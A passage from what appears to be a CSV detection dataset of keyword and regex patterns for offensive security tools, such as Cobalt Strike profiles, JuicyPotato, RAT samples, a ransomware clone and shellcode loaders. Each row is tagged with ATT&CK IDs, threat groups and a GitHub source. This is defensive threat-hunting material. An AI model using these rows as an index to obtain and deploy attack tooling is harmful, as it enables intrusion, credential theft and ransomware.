"*/jaff.profile*",".{0,1000}\/jaff\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","8225"
"*/jas502n/CVE-2020-5902*",".{0,1000}\/jas502n\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","#linux","N/A","N/A","4","373","111","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z","8226"
"*/jasmin-ransomware.git*",".{0,1000}\/jasmin\-ransomware\.git.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","8227"
"*/jasperloader.profile*",".{0,1000}\/jasperloader\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","8228"
"*/java/jndi/RMIRefServer.java*",".{0,1000}\/java\/jndi\/RMIRefServer\.java.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tool","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","N/A","10","2682","733","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z","8229"
"*/jdwp-exec.nse*",".{0,1000}\/jdwp\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8230"
"*/jdwp-info.nse*",".{0,1000}\/jdwp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8231"
"*/jdwp-inject.nse*",".{0,1000}\/jdwp\-inject\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8232"
"*/jdwp-version.nse*",".{0,1000}\/jdwp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8233"
"*/jecretz.git*",".{0,1000}\/jecretz\.git.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","1","N/A","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","8234"
"*/jecretz.py*",".{0,1000}\/jecretz\.py.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","1","N/A","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","8235"
"*/Jeringa.exe*",".{0,1000}\/Jeringa\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","8236"
"*/jiansiting/CVE-2020-5902*",".{0,1000}\/jiansiting\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jiansiting/CVE-2020-5902","1","0","#linux","N/A","N/A","1","5","5","2020-07-07T02:03:40Z","2020-07-07T02:03:39Z","8237"
"*/Jira-Lens.git*",".{0,1000}\/Jira\-Lens\.git.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","N/A","4","318","52","2024-12-31T20:06:51Z","2021-11-14T18:37:47Z","8238"
"*/Jira-Lens/*",".{0,1000}\/Jira\-Lens\/.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Fast and customizable vulnerability scanner For JIRA written in Python","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","N/A","4","318","52","2024-12-31T20:06:51Z","2021-11-14T18:37:47Z","8239"
"*/JoelGMSec/PyShell*",".{0,1000}\/JoelGMSec\/PyShell.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","8240"
"*/john -*",".{0,1000}\/john\s\-.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","8241"
"*/john.git*",".{0,1000}\/john\.git.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","8242"
"*/john/run/*.pl*",".{0,1000}\/john\/run\/.{0,1000}\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","8243"
"*/john/run/*.py*",".{0,1000}\/john\/run\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","8244"
"*/john_the_ripper_cracker.py*",".{0,1000}\/john_the_ripper_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","8245"
"*/JohnTheRipper*",".{0,1000}\/JohnTheRipper.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","8246"
"*/Jomungand.git*",".{0,1000}\/Jomungand\.git.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","N/A","10","","N/A","","","","8247"
"*/Jordan RAT.exe*",".{0,1000}\/Jordan\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","8248"
"*/Jormungand.sln*",".{0,1000}\/Jormungand\.sln.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","N/A","10","","N/A","","","","8249"
"*/Jormungandr.git*",".{0,1000}\/Jormungandr\.git.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","8250"
"*/jRAT v0.8d.exe*",".{0,1000}\/jRAT\sv0\.8d\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","8260"
"*/js_inject.txt*",".{0,1000}\/js_inject\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","8261"
"*/juicypotato*",".{0,1000}\/juicypotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8262"
"*/JuicyPotato.exe*",".{0,1000}\/JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","1","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","8263"
"*/JuicyPotato.git*",".{0,1000}\/JuicyPotato\.git.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","1","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","8264"
"*/JuicyPotato.x64.dll*",".{0,1000}\/JuicyPotato\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8265"
"*/JuicyPotato.x86.dll*",".{0,1000}\/JuicyPotato\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8266"
"*/JuicyPotato_x32.exe*",".{0,1000}\/JuicyPotato_x32\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","1","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","8267"
"*/JuicyPotato_x64.exe*",".{0,1000}\/JuicyPotato_x64\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","1","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","8268"
"*/JuicyPotatoNG.git*",".{0,1000}\/JuicyPotatoNG\.git.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","8269"
"*/JuicyPotato-webshell/*",".{0,1000}\/JuicyPotato\-webshell\/.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","1","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","8270"
"*/Jump-exec/Psexec*",".{0,1000}\/Jump\-exec\/Psexec.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","8271"
"*/JumpSession.cna*",".{0,1000}\/JumpSession\.cna.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","N/A","9","1","80","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z","8272"
"*/JumpSession_BOF.git*",".{0,1000}\/JumpSession_BOF\.git.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","N/A","9","1","80","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z","8273"
"*/k msg * Hello from Dirty Vanity*",".{0,1000}\/k\smsg\s.{0,1000}\sHello\sfrom\sDirty\sVanity.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","8274"
"*/k msg * Hello from Tam.Men*",".{0,1000}\/k\smsg\s.{0,1000}\sHello\sfrom\sTam\.Men.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","8275"
"*/K8_CS_*_*.rar*",".{0,1000}\/K8_CS_.{0,1000}_.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","8276"
"*/k8gege/*",".{0,1000}\/k8gege\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8277"
"*/k8gege/scrun/*",".{0,1000}\/k8gege\/scrun\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/scrun","1","1","N/A","N/A","10","10","179","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z","8278"
